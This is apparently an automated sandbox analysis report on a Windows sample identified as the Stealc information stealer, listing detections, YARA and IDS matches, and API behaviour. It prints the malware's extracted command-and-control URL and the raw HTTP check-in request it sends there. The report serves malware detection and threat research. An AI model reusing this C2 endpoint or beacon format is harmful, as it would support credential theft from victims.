Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
716b3c89802c1713871667444720e62f3fc064c9910a1.exe

Overview

General Information

Sample name:716b3c89802c1713871667444720e62f3fc064c9910a1.exe
Analysis ID:1542869
MD5:97035a2f339214f0fcd8ab6a3f4a259e
SHA1:3400caca0c527540f045a2f26edeb92deb85cab9
SHA256:716b3c89802c1713871667444720e62f3fc064c9910a194d89f5d076b3761485
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 716b3c89802c1713871667444720e62f3fc064c9910a1.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe" MD5: 97035A2F339214F0FCD8AB6A3F4A259E)
    • WerFault.exe (PID: 7912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 1060 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xdb0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000003.1470065487.0000000004810000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.2cf0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.3.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.4810000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-26T19:03:14.066963+020020442431Malware Command and Control Activity Detected192.168.2.84970562.204.41.17780TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeAvira: detected
                      Source: 00000000.00000003.1470065487.0000000004810000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_02CFCA87
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_02CF74A7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_02CF9DC7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D09107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_02D09107
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_02CF9D27

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeUnpacked PE file: 0.2.716b3c89802c1713871667444720e62f3fc064c9910a1.exe.400000.0.unpack
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_02CFE697
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D047D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02D047D7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_02CFEF87
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D04B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02D04B77
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D03B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02D03B17
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_02CFC0D7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_02CFDCE7
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CFE077
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02D04107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02D04107
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CFF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CFF917
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_02CF1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02CF1937

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 62.204.41.177:80
                      Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 38 39 36 36 45 36 36 38 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 2d 2d 0d 0a Data Ascii: ------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="hwid"0D8966E66891922063497------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="build"default9_cap------ECFCBKJDBFIJKFHIIDAA--
                      Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                      Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 38 39 36 36 45 36 36 38 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 2d 2d 0d 0a Data Ascii: ------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="hwid"0D8966E66891922063497------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="build"default9_cap------ECFCBKJDBFIJKFHIIDAA--
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1574803035.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177-
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmp, 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/3#
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/9
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/D
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php&(
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php1f-9bc86c8e8c94
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpB
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpO
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpy
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpz(
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php~
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1575221950.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exe, 00000000.00000002.1574803035.0000000002E7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177Cc$
                      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 1060
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\U68F3GUP.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\dcd0638c-76f3-48f0-a125-4ee2110dd3baJump to behavior
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 716b3c89802c1713871667444720e62f3fc064c9910a1.exeReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe "C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe"
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 1060
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exeSection loaded: profapi.dllJump to behavior
